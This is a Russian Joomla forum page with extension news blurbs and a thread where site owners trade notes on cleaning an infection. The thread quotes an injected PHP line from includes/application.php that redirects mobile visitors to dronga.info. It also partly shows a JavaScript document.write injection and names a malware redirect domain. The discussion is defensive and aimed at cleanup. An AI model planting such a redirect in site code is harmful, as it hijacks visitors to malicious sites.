Новости Joomla

👩‍💻 WT CDEK library v.1.3.0 - обновление PHP SDK для Joomla + CDEK.

👩‍💻 WT CDEK library v.1.3.0 - обновление PHP SDK для Joomla + CDEK.

Небольшая нативная PHP Joomla библиотека для работы с API v.2 службы доставки CDEK. Библиотека представляет собой клиент для авторизации в CDEK API по OAuth, работы с некоторыми методами API: получения ряда данных и расчета стоимости доставки. Поддерживается Joomla 4.2.7 и выше.

В пакет входят:
- библиотека Webtolk/Cdekapi
- системный плагин System - WT Cdek для хранения настроек и AJAX-интеграций
- task-плагин Task - Update WT Cdek data для обновления локальных копий справочников CDEK по расписанию
- web asset с официальным JavaScript-виджетом СДЭК

👉 v.1.3.0. Что нового?
- Полный рефакторинг библиотеки. Библиотека переработана в entity-based API с фасадом Cdek и отдельным слоем запросов. Обратная совместимость не нарушена, поэтому версия библиотеки - 1.3.0.
- Добавлена поддержка новых разделов API СДЭК. Добавлена поддержка новых разделов API СДЭК: webhooks, prealert, печатные формы, payment, passport, reverse, intakes и других сущностей.
- Улучшена интеграция с Joomla.
Улучшена интеграция с Joomla: installer script для layouts, новые поля Joomla Form для тарифов и обновлённые js виджета CDEK.
- документация библиотеки. Все методы библиотеки подробно описаны, а так же текст документации собран в отдельной папке в git репозитории и будет опубликован на сайте.

Библиотека эта нужна для разработчиков, создающих свои расширения для интеграции Joomla и курьерской службы CDEK.

Страница расширения
GitHub расширения

@joomlafeed

Поток товаров, связанные товары для JoomShopping 5+.

Поток товаров, связанные товары для JoomShopping 5+.

Расширение для JoomShopping 5+, которое позволяет связывать товары между собой на основе общих характеристик, создавая логические группы товаров в каталоге.

Расширение реализует механизм связывания товаров, похожий на стандартный Related Products, но с дополнительной возможностью быстрого подбора товаров по характеристикам.

Принцип работы
- Связывание товаров происходит в полуавтоматическом режиме.
- Администратор выбирает характеристику, по которой нужно сформировать группу товаров (например: модель, серия, объем, тип и т.д.).
- Система фильтрует и показывает список товаров с таким же значением характеристики.
- Администратор выбирает нужные товары из списка для создания связи.
Таким образом сохраняется полный контроль над связями, но значительно упрощается поиск нужных товаров.

Назначение потока товаров в одном товаре является сквозным. Это обеспечивает автоматическую связь и возможность корректировки потока в каждом товаре, который к нему относится.

Страница расширения

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 8 Ответов
  • 3557 Просмотров
*

greywolf

  • Осваиваюсь на форуме
  • 16
  • 0 / 0
файл includes/application.php

строка внизу
if (detect_mobile_device()) { header("Location: http://dronga.info/mobile/index.php?src=other");exit(); }
*

Adrian1111

  • Захожу иногда
  • 271
  • 1 / 0
Такой же вирус. В указанном месте этой строки нет. Во всех сайтах смотрел.  ((
*

Adrian1111

  • Захожу иногда
  • 271
  • 1 / 0
Подскажите, плз, скан fls.php подозрительно относится к этому файлу: /components/com_mailto/controller.php

Найдена функция $_POST[

Нашел в файле строчку: $link = base64_decode( JRequest::getVar( 'link', '', 'post', 'base64' ) );. Это Шелл?

Я сравнил с файлом из вроде как чистого бэкапа - там такая же строчка есть.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
А почитать документацию разработчиков PHP ?
http://php.net/base64_decode
Функции для кодинга base64, не всегда шелл
Не шелл.
*

greywolf

  • Осваиваюсь на форуме
  • 16
  • 0 / 0
Такой же вирус. В указанном месте этой строки нет. Во всех сайтах смотрел.  ((

Ищи:

Все файлы .js содержали вставки

;document.write(unescape("%....

сайты при заходе с мобильных устройств и из МАС ОС переводили на  newbestflashplayer.ru

Здесь вот описание:  http://www.odmin4eg.ru/2013/вирус-в-js-файлах/
Похоже, зараза свежая.

в чистке помог скрипт: http://secu.ru/scripts/find-and-replace

Вопрос как оно попало на сайты остается открытым:(
*

Adrian1111

  • Захожу иногда
  • 271
  • 1 / 0
Ищи:

Все файлы .js содержали вставки

;document.write(unescape("%....

сайты при заходе с мобильных устройств и из МАС ОС переводили на  newbestflashplayer.ru

Здесь вот описание:  http://www.odmin4eg.ru/2013/вирус-в-js-файлах/
Похоже, зараза свежая.

в чистке помог скрипт: http://secu.ru/scripts/find-and-replace

Вопрос как оно попало на сайты остается открытым:(

Уже чищу. Может к этому как-то причастен редактор TinyMCE?

Почему я так говорю - все строчки ;document.write(unescape("%.... прописываются в конце js-документов и легко удаляются. Только в файлах, относящихся к js-файлам TinyMCE я находил строчки, которые была прописаны между кодом документа, и в добавок содержали дополнительные символы в начале:

Спойлер
[свернуть]
*

Adrian1111

  • Захожу иногда
  • 271
  • 1 / 0
В общем, этот вирус еще и ссылки левые понастовлял. Причем не везде, а только в материалах созданных через раздел "Статьи".

Ссылки просматриваются через редактор TinyMCE но удалить их не представляется возможности - кнопки "сохранить" и "применить" кликабельны, но изменений не фиксируют. Сам редактор какой-то полуживой - иконок сверху нету. Работает только HTML-режим.

Текст ссылок и сами юрлы на ftp при поиске текста скриптом не обнаруживаются.  :dry:
*

greywolf

  • Осваиваюсь на форуме
  • 16
  • 0 / 0
Уже чищу. Может к этому как-то причастен редактор TinyMCE?

Почему я так говорю - все строчки ;document.write(unescape("%.... прописываются в конце js-документов и легко удаляются. Только в файлах, относящихся к js-файлам TinyMCE я находил строчки, которые была прописаны между кодом документа, и в добавок содержали дополнительные символы в начале:

Спойлер
[свернуть]

как правило то редактор JCE
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 4200
Последний ответ 31.03.2024, 16:14:32
от SeBun
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 678
Просмотров: 272641
Последний ответ 14.09.2022, 14:29:43
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 3505
Последний ответ 05.10.2021, 21:39:26
от ShopES
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 3093
Последний ответ 03.11.2020, 17:36:03
от Cedars
Мониторинг файлов CMS и сайта - предлагаю решение

Автор GRIG

Ответов: 18
Просмотров: 5441
Последний ответ 28.08.2020, 22:00:30
от cntrl